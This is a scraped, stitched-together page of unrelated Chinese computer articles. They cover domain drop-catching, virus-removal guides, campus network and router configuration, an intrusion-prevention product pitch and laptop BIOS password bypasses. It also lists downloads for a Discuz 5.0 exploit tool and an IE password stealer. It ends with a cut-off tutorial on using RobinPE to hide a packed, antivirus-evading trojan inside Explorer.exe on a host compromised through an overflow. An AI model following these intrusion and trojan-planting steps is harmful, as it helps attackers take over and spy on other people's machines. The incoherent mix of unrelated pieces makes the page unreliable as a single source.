3:如果在2所述的30天期限内没有续费,即从2003年03月31日开始,域名将变成RedemptionPeriod状态,该状态将会保持30天,在此期间该域名不会掉下来,但是除了restore命令以外的所有命令对此域名无效;
4:域名在RedemptionPeriod状态下可以restore回来,但每restore一次需要支付(折合)人民币1000元(含一年续费);
5:如果域名在RedemptionPeriod状态下的30天没有restore,从2003.04.29开始域名变成PendingDelete状态(5天),2003年04月04日该域名将会删除。
在清楚了一个域名的生存全过程后,就不难理解在本文后面所谈及的抢注了。
一个域名在被删除之后,任何个人、机构,都可以通过域名注册商去注册这个域名,没有任何的限制,完全遵从先到先得的原则。由于现在有很多网站提供将被删除的域名的查询功能。因此,一些好的域名,往往是在被删除后的一秒钟之内就被一个新的注册者所注册。大多数情况下,甚至你还来不及查询到这个域名是被删除了,就已经被人捷足先登了。
在利益的驱使下,很多注册商也与这些域名抢注商达成了协议,从而使得这场竞争变得更加残酷,也使得个人注册到这些非常有价值的域名的机会减小了很多很多。
提供抢注域名服务的公司主要有以下几家,同时介绍一下各自的特点:
Pool: 一度是抢注圈中的老大,近来越来越受到Enom的挤压而显得力不从心,但对一些价值极高的域名的抢注机会仍然是最高的。 预订方式:底价60美元。如有超过1人同时预订同一域名,领先者为最先下订单的预订者,其他人被视为OUTBID,域名由pool抢注后,会进入竞价,大约是三天竞价时间结束后,出价最高者得到域名。
Enom: 10美元加注册费,也就是代理商为18.95美元底价,直接注册的最终用户为39.5美元底价,长期作域名抢注的,一般使用的是RESELLER帐号,可能是别人开出的下级帐号,但除了价格之外,无其他任何区别。Enom的竞价略为复杂,正常情况下,分为两种:正常的竞价和荷兰式拍卖。在荷兰式拍卖的情况下,是因为几个预订者,都只出价10美金,未达到进入private竞价的30美金价格,在这种情况下,进入荷兰式拍卖。具体是:底价为10美金,直接出价60美金可得到域名,随着时间的推迟,直接出价拿到的价格越来越低,也就是由60美金,降为55,50,45,直到降至比出价第二高者高5元的价格为竞价结束,或者有竞争者以直接拿走的价格来拿到域名。另一种是正常的竞价,在有多名预订者出价超过30美金的情况下,每次加价10美金,唯一最高价者获得域名。如在这一阶段未产生唯一最高价者或最高价者未付费,则进入公开竞价。
Snapnames: 60美元起价,成功率较高,和Enom,pool之间有三足鼎立之势,曾经有人质疑Snapnames的信誉,但近期来看,基本没发现问题。 拍卖过程与Pool类似,由60美金向上直到结束时最高价者得到域名。
NameWinner: 40美元起价(有部分老帐号可以出价30美金起),只有在预订期间曾经达到过最高价,或使当前的价格向上提升但自己仍然是OUTBID的预订者才可以进入竞价,否则要交纳一次性费用50美金才能进入域名的竞价。域名竞价时间也是三天,结束时的最高价者得到域名,但曾经亲自发生过因Namewinenr系统出错,自己与自己竞价的影子竞价的情况,要适当留意。
Godaddy: 18.95美元固定价,为著名公司中成功率最低,但优点是信誉有保证,而且预订价格固定不变,有抢到价值数百美金域名的可能,有点碰运气的感觉,因为预订要预付款购买额度,有资金充足者大量在此预订。
以上介绍的是抢注界公认的五大抢注商,其他也有各别团体或各人提供此类服务,包含国内也有几家,但综合抢注实力与以上五家无法相比。
[推荐]Dz5.0漏洞的原理和工具的使用以及漏洞修补
动画类型: 投稿动画
运行环境: Win9x/NT/2000/XP/2003
授权方式: 投稿收录
动画大小: 46700 K
动画等级: ★★★
整理时间: 2007-3-12 21:26:17
开 发 商: jackal
***************************************************************************
本动画的MD5值为:
583d03dbc40132ecfd187f4fe6942597 dz.exe
***************************************************************************
动画下载==》》
[推荐]最强的内存维护工具WinCleaner Memory Optimizer V5.2
软件类型: 国产软件
运行环境: Win9x/NT/2000/XP/2003
授权方式: 免费版
软件大小: 611 K
软件等级: ★★★
整理时间: 2007-4-10 18:11:15
开 发 商: 佚名
WinCleaner 内存优化器堪称目前市面上最强的内存维护工具!它可以智能清理、优化,并释放您电脑上未被有效使用的内存资源,它是专为 XP 以上版本的 Windows 系统设计的内存维护工具。
内存的大小并不直接意味着性能的强劲与否,如何有效的利用内存资源才是内存优化类软件所要探索的正道。WinCleaner 内存优化器绝非单单是将物理内存的负荷转移到虚拟内存上那种拆东墙补西墙加重硬盘读写负担的治标不治本的常规内存维护工具。它是为数不多的基于物理内存负载、CPU 负载,和系统全局负载进行智能维护的高端产品!对于初级用户来说,WinCleaner 内存优化器是一款一劳永逸(set-and-forget)的便捷型软件,您只要设定目标剩余内存数量(特指物理内存)和自动优化的时间间隔即可让其自动为您服务。
修正了升级微软10月补丁后程序无法运行的问题,系脱壳后修复问题所致。
下载连接==》
IE密码截取器
软件语言: 简体中文
软件类型: 国产软件
运行环境: Win9x/NT/2000/XP/2003
授权方式: 免费版
软件大小: 608 K
软件等级: ★★★
整理时间: 2007-4-9 18:18:11
开 发 商: 海盗工作…
下载连接=〉〉
推荐:清除那些使得隐藏文件无法显示的病毒
选择“显示隐藏文件”这一选项后,发现U盘有个文件闪出来一下就马上又消失了,而再打开文件夹选项时,发现仍就是“不显示隐藏文件”这一选项。而且刚发现点击C、D等盘符图标时会另外打开一个窗口!
总结:
I、病情描述:
1、无法显示隐藏文件;
2、点击C、D等盘符图标时会另外打开一个窗口;
3、用winrar查看时发现C、D等根目录下有autorun.inf和tel.xls.exe两个恶心的文件;
4、任务管理器中的应用进程一栏里有个莫明其妙的kill;
5、开机启动项中有莫明其妙的SocksA.exe。
II、解决办法:
用了一些专杀工具和DOS下的批处理文件,都不好使,只好DIY。注意在以下整个过程中不要双击硬盘分区,需要打开时用鼠标右键—>打开。
一、关闭病毒进程
在任务管理器应用程序里面查找类似kill等你不认识的进程,右键—>转到进程,找到类似SVOHOST.exe(也可能就是某个svchost.exe)的进程,右键—>结束进程树。
二、显示出被隐藏的系统文件
开始—>运行—>regedit
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\
Advanced\Folder\Hidden\SHOWALL
删除CheckedValue键值,单击右键 新建—>Dword值—>命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。
三、删除病毒
在分区盘上单击鼠标右键—>打开,看到每个盘跟目录下有autorun.inf 和tel\.xls\.exe 两个文件,将其删除,U盘同样。
四、删除病毒的自动运行项
开始—>运行—>msconfig—>启动—>删除类似sacksa.exe、SocksA.exe之类项,或者打开注册表运行regedit
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
删除类似C:\WINDOWS\system32\SVOHOST.exe 的项。
五、删除遗留文件
C:\WINDOWS\ 跟 C:\WINDOWS\system32\ 目录下删除SVOHOST.exe(注意系统有一个类似文件,图标怪异的那个类似excel的图标的是病毒)session.exe、sacaka.exe、SocksA.exe以及所有excel类似图标的文件,每个文件夹两个,不要误删哦,自己注意。重启电脑后,基本可以了。
Avaya公司校园千兆网解决方案
用户环境:高校校园网
Avaya公司根据多年的实践经验,提出高校校园网的总体规划方案,如附图所示。
网络系统主干交换设备使用Avaya公司的Cajun系列中的CajunP550千兆路由中心交换机。
二级设备根据实际信息点选用CajunP120或选用CajunP330可堆叠工作组交换机,通过千兆光纤链路连接到网络中心CajunP550,若校园网铺设了多条光纤,可采用OpenTrunk技术组成链路汇集组,这样一方面提高了带宽,另一方面提高了容错性。
本方案中主干网络交换机CajunP550散出多条1000Mbps链路和全双工快速以太网链路至各个二级交换机堆叠,主干聚集带宽实现全容错、全双工双向4Gbps,采用协议无关的分布式模块化交换处理,通过在CajunP550增加模块,即可进一步增加网络交换带宽。
各个CajunP330堆叠为校园网提供100Mbps全双工上连带宽,同时向下给每个站点提供交换式、全双工的10Mbps和100Mbps独用带宽。如果需要的话,利用剩余的光缆芯对和CajunP550主干交换机上的空闲端口,还可以成倍增加上连带宽和站点数目。
Avaya公司给出的高校校园网的解决方案,选用10/100/1000Mbps以太网技术,选择支持VLAN技术、QoS等技术的产品,设计出具有较高性能的、具有一定可靠性的、满足网络教学应用与管理需要的多媒体网络系统。满足了高校用户众多对网络性能、应用多样性对数据传输优先级的要求。
在网络中心机房,采用大功率UPS集中供电的方式已被广泛接受,而众多的网络交换和路由设备,由于其分散性,需要安置小功率的UPS。为了保证网络的安全运行,必须选择高质量的产品。首先,它是能够全面消除电源污染的在线式产品,使网络不受电源问题的影响;其次,对于长延时产品,应该具有很好的电池管理功能。华为电气的UPS产品,较好地解决了这些问题。
在网络中,分散供电使管理员很难实时地了解远处UPS的运行状态。为此,华为电气提出了多种监控方案,分别通过采用RS232卡和SNMP卡实现,如附图所示。
通过使用UPSite监控软件,可以实现UPS在网络中的实时监控。在使用RS232接口时,可根据设备的具体情况采用不同的组件,以达到在最节省硬件资源占用的条件下实现可靠的保护。当只需要网络设备在市电停电后,能在无人值守的情况下自动保存数据并安全关机,可以只安装UPSite中的守候程序。如果需要实时显示UPS的工作状态,则只需要安装后台管理软件。对于已使用RS232与UPS 连接的计算机和服务器,通过安装监控代理,便可将UPS的各种工作信息和电网电源的状态自动发送到网上,使网络上安装守候程序和后台管理的设备能够及时获得电源方面的信息。
此外,用户也可以在远离计算机和服务器的地方,使用UPS内置SNMP卡,直接把UPS连接到网络中,使UPS成为网络中的终端设备。这样,用户可通过专用软件或Web浏览器完成对UPS的监控,使网络更加可靠。
浏览器执行exe文件的探讨
答案是肯定的。不过先别高兴,只能执行服务器端的,而且是必须经过授权的。否则服务器想黑你就太容易了,谁敢看我我就格式化谁。
二:他是如何实现的。是靠asp文件吗?
在服务器端执行文件是靠SSI来实现的,SSI时服务器端包含的意思(不是SSL),我们经常使用的#include就是服务器端包含的指令之一。不过,这次要介绍的就是——#exec。就是他可以实现服务器端执行指令。
不过,这次他不能用于.asp的文件。而只能用.stm、.shtm 和 .shtml这些扩展名。而能解释执行他们的就是Ssinc.dll。所以,你写好的代码必须保存成.stm等格式才能确保服务器能执行。
三:如何执行呢?
终于开始讨论实质性问题了。
它的语法是:
CommandType是参数,他有两个可选类型:
1.CGI 运行一个应用程序
如 CGI 脚本、ASP 或 ISAPI 应用程序。
CommandDes cription 参数是一个字符串
教你打开丢失密码的笔记本
对于笔记本电脑,最好不要轻易的设置密码,因为笔记本电脑的开机密码并不是象PC机那样存放在CMOS电路中可以通过放电清除的,目前较新的笔记本都是将密码保存在主板的几块逻辑电路中,我们个人是无法破解的(此系列电脑,密码可加至三层,每一层都针对不同的设备加密,如果设置的密码丢失的话,电脑可就是摆设了),要破解的话得换,可能得花不少钱。
但是对于型号较老的笔记本电脑,你可以试试下面的方法,也许可以解除笔记本的开机密码:一是改变机器的硬件配置,比如把硬盘取下来,再重新启动有可能会自动进入Setup程序,并清除开机密码。二是可以试试在主板上找一个芯片,这个芯片俗称818芯片,一般是“MC146818"有24个引脚,短接第12脚和第24脚1秒钟,或者找一个标有” MC14069"的芯片,把其第14脚对地短接一下,也许可以达到清除密码的目的。
对于东芝笔记本电脑如果你忘记了你的口令,可以使用口令服务软盘来解决(口令服务软盘在你每次设置或修改开机口令时生成,请妥善保存)。具体步骤如下:在驱动器中插入口令服务软盘。按下Enter,出现下列消息:
Set Pass Again?(Y/N)
按Y运行TSETUP程序,设置新口令。按N重新启动电脑。
注意:口令服务软盘必须被插入驱动器中,否则显示将返回到Password=。如果已经在驱动器中插入了软盘,该消息仍然出现,口令服务软盘可能有问题。此外在使用口令服务软盘时要注意以下两个问题:如果BIOS引导优先级设置为硬盘或光驱,按复位按钮,保持F键按下以确保从软盘驱动器引导。如果电脑处在恢复方式,打开电源时口令服务软盘将不起作用。这时,也请先按复位按钮。
对于型号较老的东芝笔记本电脑,其BIOS口令保护存在一个“后门”。你可以试试下面介绍的办法,也许能绕过东芝笔记本BIOS口令限制,而无需输入任何密码认证。准备好一张格式化好的空软盘,另外一台计算机,一种二进制编辑软件(比如Norton DiskEdit或者UtralEdit 32等)。具体的步骤如下:
1.启动另一台电脑,打开二进制编辑器,将软盘插入驱动器,修改软盘第一扇区的前5个字节,使其变成:4B 45 59 00 00,注意引导扇区是第0扇区,不要改错了。然后保存修改,你现在就有了一张钥匙盘了。将这张软盘插入笔记本电脑的软驱中,按reset键重启动,当提示你输入口令时,直接按回车,系统提示你是否要再次设置口令。按"Y",回车。然后你就看到了BIOS的设置界面,可以重新设定一个新口令了。
2.笔记本电脑是TOSHIBA,可以方便的借助电脑本身的打印口来清除密码。
联接为:1脚接5脚和10脚,2脚接11脚,3接17,其它类推。
1- 5-10
2 -11
3 -17
4 -12
6 -16
7- 13
8- 14
9 -15
此表为电脑主板上接口。外接的接口与此相反,请注意。
如果上面的介绍的方法都不起作用,就只有送笔记本电脑专业维修点用特殊方法处理,倘若过了保修期,在价格上你只有任人宰割了。因此一般没有特殊原因,笔记本电脑还是不要随意设置开机口令。为保证数据安全,建议大家装WIN2000/NT或WINXP操作系统,并使用NTFS格式分区,这样其实比单纯设置开机口令,更能保证系统安装。现在有些笔记本电脑还提供了指纹开机识别系统等安装措施,取代传统的BIOS密码保护。
千兆应用入侵防护系统保护解决方案
随着对网络安全问题的理解日益深入,入侵检测技术得到了迅速的发展,应用防护的概念逐渐被人们所接受,并应用到入侵检测产品中。而在千兆环境中,如何解决应用防护和千兆高速网络环境中数据包线速处理之间的矛盾,成为网络安全技术发展一个新的挑战。
入侵检测技术的演进
入侵检测系统(IDS, Intrusion Detection System)是近十多年发展起来的新一代安全防范技术,它通过对计算机网络或系统中的若干关键点收集信息并对其进行分析,从中发现是否有违反安全策略的行为和被攻击的迹象。IDS产品被认为是在防火墙之后的第二道安全防线在攻击检测、安全审计和监控等方面都发挥了重要的作用。
但在入侵检测产品的使用过程中,暴露出了诸多的问题。特别是误报、漏报和对攻击行为缺乏实时响应等问题比较突出,并且严重影响了产品发挥实际的作用。Gartner在2003年一份研究报告中称入侵检测系统已经“死”了。Gartner认为IDS不能给网络带来附加的安全,反而会增加管理员的困扰,建议用户使用入侵防御系统(IPS,Intrusion Prevention System)来代替IDS。Gartner公司认为只有在线的或基于主机的攻击阻止(实时拦截)才是最有效的入侵防御系统。
从功能上来看,IDS是一种并联在网络上的设备,它只能被动地检测网络遭到了何种攻击,它的阻断攻击能力非常有限,一般只能通过发送TCP reset包或联动防火墙来阻止攻击。而IPS则是一种主动的、积极的入侵防范、阻止系统,它部署在网络的进出口处,当它检测到攻击企图后,它会自动地将攻击包丢掉或采取措施将攻击源阻断。因此,从实用效果上来看,和IDS相比入侵防御系统IPS向前发展了一步,能够对网络起到较好的实时防护作用。
近年来,网络攻击的发展趋势是逐渐转向高层应用。根据Gartner的分析,目前对网络的攻击有70%以上是集中在应用层,并且这一数字呈上升趋势。应用层的攻击有可能会造成非常严重的后果,比如用户帐号丢失和公司机密泄漏等。因此,对具体应用的有效保护就显得越发重要。从检测方法上看,IPS与IDS都是基于模式匹配、协议分析以及异常流量统计等技术。这些检测技术的特点是主要针对已知的攻击类型,进行基于攻击特征串的匹配。但对于应用层的攻击,通常是利用特定的应用程序的漏洞,无论是IDS还是IPS都无法通过现有的检测技术进行防范。
为了解决日益突出的应用层防护问题,继入侵防御系统IPS之后,应用入侵防护系统(AIP,Application Intrusion Prevention)逐渐成为一个新的热点,并且正得到日益广泛的应用。
应用入侵防护
对应用层的防范通常比内网防范难度要更大,因为这些应用要允许外部的访问。防火墙的访问控制策略中必须开放应用服务对应的端口,如web的80端口。这样,黑客通过这些端口发起攻击时防火墙无法进行识别控制。入侵检测和入侵防御系统并不是针对应用协议进行设计,所以同样无法检测对相应协议漏洞的攻击。而应用入侵防护系统则能够弥补防火墙和入侵检测系统的不足,对特定应用进行有效保护。
所谓应用入侵防护系统AIP,是用来保护特定应用服务(如web和数据库等应用)的网络设备,通常部署在应用服务器之前,通过AIP系统安全策略的控制来防止基于应用协议漏洞和设计缺陷的恶意攻击。
在对应用层的攻击中,大部分时通过HTTP协议(80端口)进行。在国外权威机构的一次网络安全评估过程中发现,97%的web站点存在一定应用协议问题。虽然这些站点通过部署防火墙在网络层以下进行了很好的防范,但其应用层的漏洞仍可被利用进而受到入侵和攻击。因此对于web等应用协议,应用入侵防护系统AIP应用比较广泛。通过制订合理的安全策略,AIP能够对以下类型的web攻击进行有效防范:
恶意脚本;
Cookie投毒;
隐藏域修改;
缓存溢出;
参数篡改;
强制浏览;
Sql插入;
已知漏洞攻击。
应用入侵防护技术近两年刚刚出现,但发展迅速。Yankee Group预测在未来的五年里, AIP将和防火墙,入侵检测和反病毒等安全技术一起,成为网络安全整体解决方案的一个重要组成部分。
千兆解决方案
应用入侵防护产品在保护企业业务流程和相关数据方面发挥着日益重要的作用,同时随着网络带宽的不断增加,只有在适合千兆环境应用的高性能产品才能够满足大型网络的需要。
传统的软件形式的应用入侵防护产品受性能的限制,只能应用在中小型网络中;基于x86架构的硬件产品无法达到千兆流量的要求;近年来,网络处理器(NP)在千兆环境中得到了日益广泛的应用,但NP的优势主要在于网络层以下的包处理上,若进行内容处理则会导致性能的下降。
通过高性能内容处理芯片和网络处理芯片相结合形式,为千兆应用入侵防护产品提供了由于的解决方案。其设计特点是采用不同的处理器实现各自独立的功能,由网络处理芯片实现网络层和传输层以下的协议栈处理,通过高速内容处理芯片进行应用层的协议分析和内容检查。从而实现了千兆流量线速转发和高速内容处理的完美结合,真正能够为用户提供千兆高性能的应用防护解决方案。
在上面系统框架中,包处理引擎收到数据包后,首先由网络处理器进行传输层以下的协议栈处理,并将数据包还原成数据流。接下来由内容处理器对数据流进行应用协议处理,根据控制器设定的安全策略对各种应用攻击进行检测和过滤。只有符合安全策略要求的数据流才会被发送到服务器,攻击包则被丢弃。
在高性能的千兆解决方案中,能够实现网络层到应用层的多层次立体防护体系。对于面向大型web应用,产品通过多种功能的集成实现有效的应用防护:
Web应用入侵防护。通过系统内置的网络内容处理芯片,对web请求和回应流量进行细致的分析。根据内置的规则及启发式的安全策略,有效防范各种针对web应用的攻击行为。
DOS攻击的防护。系统通过网络处理芯片,对Synflood、Icmpflood、Upflood、PinfOfDeath、Smurf、Ping Sweep等网络层的拒绝服务攻击进行过滤的防范,有效保护服务器。
访问控制。通过硬件的ACL匹配算法,系统能够在实现线速转发的同时对数据包进行实时的访问控制。
中科网威在新一代千兆应用入侵防护产品设计中采用了上述解决方案,实现了千兆流量下的线速处理。系统以透明模式接入网络,在增强安全性的同时,网络性能不会受到任何影响,真正实现了应用层内容处理和千兆高性能的完美结合。
小结
为了保护企业重要的应用服务资源,应用入侵防护产品AIP正在得到日益广泛的应用。中科网威通过内容处理器和网络处理器相结合的技术,有效解决了千兆网络环境中应用入侵防护和性能之间的矛盾,为用户提供了全新的解决方案。
保障城域网路由器网络层可靠性技术分析
宽带业务快速发展,给传统电信业和IT业带来了深刻的变革。多业务、多网络的融合已经成为不可逆转的趋势。 宽带城域网作为城域网内的主要网络实体将成为3G、NGN以及其它新兴增值业务的承载平台。
3G、NGN这类实时的语音和视频应用,要求城域网提供服务质量保证和类似于传统电信技术99.999%的电信级网络可靠性要求。同时,激烈的竞争也推动运营商向客户提供类似SLA有服务质量保证的服务,网络可靠性是其中的首要也是最重要的指标。通过提高网络的可靠性,运营商可以通过提供差别化的服务,在运营商之间的竞争中占居有利的地位,进一步树立和巩固企业的品牌形象。
城域网路由器的可靠性体现在以下两个方面,一个是设备层的可靠性,另一个是网络层的可靠性。网络可靠性是城域网路由器可靠性保障的一个重要内容,由于传统的路由器协议收敛比较慢(IGP在秒级,BGP在分钟级),不能满足承载实时业务的需求。网络可靠性也是城域网路由器新技术比较活跃的领域。
目前新出现的网络层可靠性技术主要有IP路由快速收敛、端到端LSP备份、MPLS快速重路由、平稳重启等。
IP路由快速收敛
IP动态路由是最基本的网络层可靠性保障机制,是IP路由网络与生俱来的功能。IP动态路由协议负责进行网络层IP转发路径计算,在链路或者节点发生故障导致原数据转发路径中断时,路由协议对数据转发路径进行动态重新计算,虽然各种路由协议通过采用不同的机制,其响应时间有差别,但是平均水平在秒一级。对于传统IP业务这个恢复时间可以接受,但是对于承载实时业务等多业务的电信级IP网来说要求毫秒级恢复响应时间,传统IP动态路由技术和这一要求有很大差距。
在传统路由协议的基础上,进行改进可以缩短IP路由协议的故障响应时间,这些措施主要是加快路由协议的收敛。加快路由协议收敛速度可以分为链路故障检测、路由重计算、路由信息更新等几个方面考虑。通过加快链路之间Hello消息的发送频率,加快SPF计算速度和为路由更新消息设定高优先级,路由协议可以快速发现、处理故障,并且准确快速地进行路由更新,加快路由协议的收敛,通过优化IGP路由协议可以实现小于1s的收敛。
另一种加快路由协议收敛的方法是采用IGP和EGP对网络进行合理的层次规划,IGP进行域内设备的路由,EGP(BGP4)承载外部路由,两种路由之间进行有效隔离,不相互进行重分配。IGP和BGP的合理分工,形成了一个层次化的路由结构,域内和域间路由协议的收敛相互独立,互不影响,可以实现最快速度收敛。
LSP保护切换
保护切换是ITU-T采用的术语,保护切换技术对于提高MPLS网络的可用性和稳定性具有关键意义。保护切换一般对受保护LSP路由的预计算和资源的预分配,所以可以保证在LSP连接失效或者中断后可以快速重新获得网络资源。
目前技术的发展只可以支持对点到点LSP的保护切换,保护可以采用两种方式:1+1保护和1:1保护。
1+1保护使用一条专用的备份LSP作为主LSP保护,在IngressLSR处,主LSP和备份LSP桥接在一起,主LSP上的流量复制到备份LSP上同时传送到EgressLSR,EgressLSR根据故障指示参数的取值,选择接收主备LSP上的流量。
1:1保护时也使用专用的备份LSP作为主LSP的保护,但是主备LSP不同时传送相同的流量,备份LSP在主LSP工作正常的前提下可以传送其它流量,流量的保护切换裁决在IngressLSR进行。
MPLS快速重路由(FRR)
为了满足诸如像视频会议电视这一类业务的实时应用,必须对这些流量提供类似于传统SDHAPS毫秒级的LSP保护能力。
LSP保护切换技术,需要信令协议的介入,故障点到恢复点的故障指示信令传递引入了不必要的网络恢复延时。MPLS快速重路由技术可以实现在没有信令介入情况下,由故障检测点直接对故障链路流量根据预先设定的保护路径进行重定向,恢复点即为故障点。多数的快速重路由方案依赖预先建立的备份通道,当网络恢复点检测到网络故障时,它要做的工作就是简单地更新LSP交换表,使流量从故障端口的LSP切换到预先在正常端口建立的LSP内。
快速重路由的优势除了可以提高保护恢复的速度外,通过有选择的在网络薄弱环节配置保护能力,避免了在可靠网络重复保护、无谓消耗核心网络资源。MPLS快速重路由技术提供50ms内的保护切换,可以作为SDHAPS保护机制的替代。
MPLS快速重路由采用如下配置过程:
首先,在LSP的入口处即LSR1,使用一条用户命令激活MPLS保护切换功能;LSR1向LSP路径上的所有LSR发送信令,每个LSR都计算出一条旁路下一跳LSR的备份LSP,LSP快速重路由配置即完成。当LSP路径上的某个LSR检测到下游故障时,由该LSR在本地将流量切换到备份LSP内。
在IETF中有多种快速重路由的方案,主流的两种保护方式为链路保护和节点保护,其解决问题的思路和复杂度各异,目前该技术还没有形成正式的RFC.
平稳重启(Gracefulrestart)
引起控制平面重启的可能因素包括:软件升级、软件Bug或者硬件故障,无中断重启可以做到控制平面重启时,数据平面无间断转发。但是如果控制平面故障,对等路由器将重新计算路由,旁路故障路由器,数据平面的不间断转发就没有意义,而且故障路由会扩散到整个网络范围。在MPLSVPNPE路由器上如果发生这种情形,其结果是灾难性的。
控制平面平稳重启技术可以有效解决这个难题,采用该技术的路由器在控制平面发生故障时,可以通知邻近路由器继续使用原路径进行数据转发,同时重启路由器重新和邻近路由器建立路由状态,保证在重启过程中业务可用性,最小化单个设备重启对整个网络的影响。
在平稳重启的过程中路由器不保存相关的协议状态,所以引起的重启软件故障不会延续到重启后。
平稳重启是新特性,很多旧设备无法支持,所以可以在局部子网内支持该特性的设备上使用。
在网络边界,运营商边界路由器面对众多客户,而且一般都没有冗余措施,最适合使用平稳重启技术。网络核心一般都采用冗余路径进行保护,而且带业务重启容易造成路由环,所以不建议在网络核心采用平稳重启技术。
推荐:如何在无法打开驱动器情况下杀毒的方法
昨天将U盘插到电脑后双击无法打开,紧接着双击所有驱动器盘符都没有办法打开,试验以后发现只有使用资源管理器可以。但终究不爽,鬼知道病毒在电脑里还干了些什么,决定彻底杀掉。
症状描述:
1.双击驱动器盘符无法打开,资源管理器可以使用。
2.在开始→运行里输入cmd进入命令行模式,输入C:回车,进入C盘根目录,输入dir/a查看所有文件,发现存在如下两个文件:Autorun.inf RavMon.exe。
3.在开始→运行里输入msconfig,进入系统配置程序,选择“启动”标签,里面有一个叫做“MDM”的项指向“C:\windows\mdm.exe”。
解决方法:
1.重新启动,开机时按F8,进入带命令行的安全模式,选择Administrator账号登陆。
2.在命令行下输入regedit进入注册表,查找"RavMon.exe",如果发现匹配项就删除(我没有发现,这样做是保险起见)。注意RsRavMon是瑞星杀毒软件,不用删除。
3.在命令行下输入msconfig,进入系统配置程序,选择“启动”标签,将所有“MDM”项前面的勾去掉(我删了一个还有一个,md),保存。
4.在命令行下输入以下指令:del C:\Autorun.inf /f /s /q /a del C:\RavMon.exe /f /s /q /a del D:\Autorun.inf /f /s /q /a del D:\RavMon.exe /f /s /q /a ……有多少盘符输多少个。注意这个指令会删除根目录往下所有目录的对应文件,所以大家看到删除了根目录下的以后马上按Ctrl+C中断。
5.重新启动,ok啦。
6.要彻底清楚,主要还是要把U盘里的毒源杀掉。我没有试别的办法,直接偷懒进Linux下用rm删了个干净。如果大家认识的人有装Linux的可以请他帮忙,个人认为这样做是最安全的。在Windows/Dos平台下怎么做还请高手出招。
说明:1.MDM是微软的Machine Debug Manager,系统进程;病毒伪装成了mdm.exe。2.本杀毒方法思想可用于清除类似病毒。
正确配置路由协议合理使用路由器资源
管理网络带宽正变得越来越重要。在没有其他路由器的网络上,对网络接口上流出的广播通信进行路由毫无意义。这对你的路由器资源使用来说,其效率都是非常低下的。让我们来看看如何通过使用passive-interface命令,来更好的进行带宽控制。
要想正确的配置路由协议,passive-interface命令绝对不可不知。不过,如果你不是在使用动态路由协议(比如OSPF,EIGRP,或者RIP)的话,那你倒也用不到这个命令。
passive-interface命令仅仅工作于路由器配置模式(Router Configuration Mode)。当你看到如下所示的命令行提示符时,那你就知道自己已经进入该模式了:
Router(config-router)
你可以使用passive-interface命令告知动态路由协议不要通过该接口发送网络广播。这个命令可以对所有的IP路由协议生效,仅BGP除外。
不过,该命令在OSPF上工作,和在IS-IS上有点不同。用OSPF,被动指定的网络接口作为stub(末节区域)出现,并不发送和接收任何路由更新。使用RIP,IGRP,以及EIGRP时,它不发送任何路由,但是它能接收它们。同样,它也将对网络上所有非被动的接口发送广播。
使用passive-interface命令有两种方式。
指定某个接口成为被动模式,这意味着它将不会发出路由更新。
首先将所有接口设为被动模式。然后在那些你打算发送路由更新的接口上,使用no passive-interface命令。
让我们来对两种方式各看一个示例。注:两个事例都假定你已经预先添加了对路由协议是被动接口的网络(使用网络命令)。
让一个接口变成被动模式,只需要对接口进行指定。这里是一个示例:
Router(config)
# router rip Router(config-router)
# passive-interface Ethernet 0/0
要将所有接口设为被动,然后单独打开某个接口,仅需使用passive-interface default和no passive-interface命令(在IOS 12.0中介绍)。下面是个示例:
Router(config)
# router rip Router(config-router)
# passive-interface default Router(config-router)
# no passive-interface Serial 0/0
让我们来看一个简单的网络,专用于示范该命令的深层应用。假设你有2台路由器,通过一个T1回路相连,且路由器均运行RIP.每个路由器连一个局域网,电脑通过以太网卡连上局域网。
你需要每台路由器都了解对方路由器的网络,对吧?这也是为什么要使用动态路由协议的目的所在。但是在局域网上,并无其他路由器可以让这两台路由器交换路由更新。
在这种情况下,你为什么会想每30秒在局域网接口广播一次路由更新,一直持续呢?答案是你不想。这是一种对局域网带宽和电脑CPU时间的浪费。如果它只是一个小更新,它的确不会引起什么问题,但如果你能避免,何必发送这种毫无必要的通信呢?
那怎么才能消除这种毫无必要的通信呢?在每台路由器上,进入RIP配置模式(RIP Configuration mode),并使用passive-interface命令,停止在局域网端口上发送路由更新。下面是示例:
Router(config)
# router RIP Router(config-router)
# passive-interface Ethernet 0/0
这个,当然,假设你已经预先使用网路命令配置好了打算广播的网络。下面是个事例:
Router(config-router)
# network 1.0.0……0 (the Serial network)
Router(config-router)
# network 2.0.0.0 (the Ethernet network)
要记住,这意味着系统通过连到另一台路由器的串行接口,将对你设置的两个网络进行广播。另外,这也没有阻止你的路由器从局域网络接口(使用RIP)接收路由更新。如果另一台路由器正巧也在局域网上,并向你的路由器发送了更新,它依旧可以收到这些更新。
[推荐]Dz5.0最新漏洞利用工具
Windows XP自带的一个罕见的功能
见缝插针 伪造木马——RobinPE
有没有隐藏性更高一些的木马捆绑工具呢?是否可以在捆绑了木马后让宿主文件体积不发生变化呢?最新的木马后门植入工具RobinPE,可以将后门文件藏匿在任意的EXE程序文件中,以后每次正常启动程序文件时,我们植入的文件就会悄悄的生成并执行,最重要的是植入木马后宿主文件的大小基本不发生变化。下面就以笔者的使用经历为例,向大家介绍一下这个工具的使用吧!
一、准备植入木马
首先是利用系统漏洞,溢出得到了一台主机Local System权限的Shell,然后克隆管理员帐号,清除了杀毒软件之类的文件上传障碍。其具体过程就不再详述了,下面主要是讲述如何将木马植入Explorer.exe进程中,再将其上传到远程主机上执行并进行控制。
首先需要在本地将木马植入Explorer.exe文件中,这里我们使用一个叫作“Fuck Trojan”的木马,并将对服务端程序“Server.exe”加壳处理以躲过杀毒软件的查杀。备份“Explorer.exe”文件,然后运行工具RobinPE。
二、计算空间——木马植入前的关键
使用RobinPE在正常程序中植入木马后,有一个特点就是程序将保护原来的体积大小不发生变化,从而不易被查觉。其原理就是在植入前先执行计算程序文件可利用的空间,将后门木马植入缝隙而不额外增加代码区块,因此文件的大小不会发生变化。在植入程序前,首先需要计算程序可利用空间,根据计算后得到的结果才能确定可否植入。
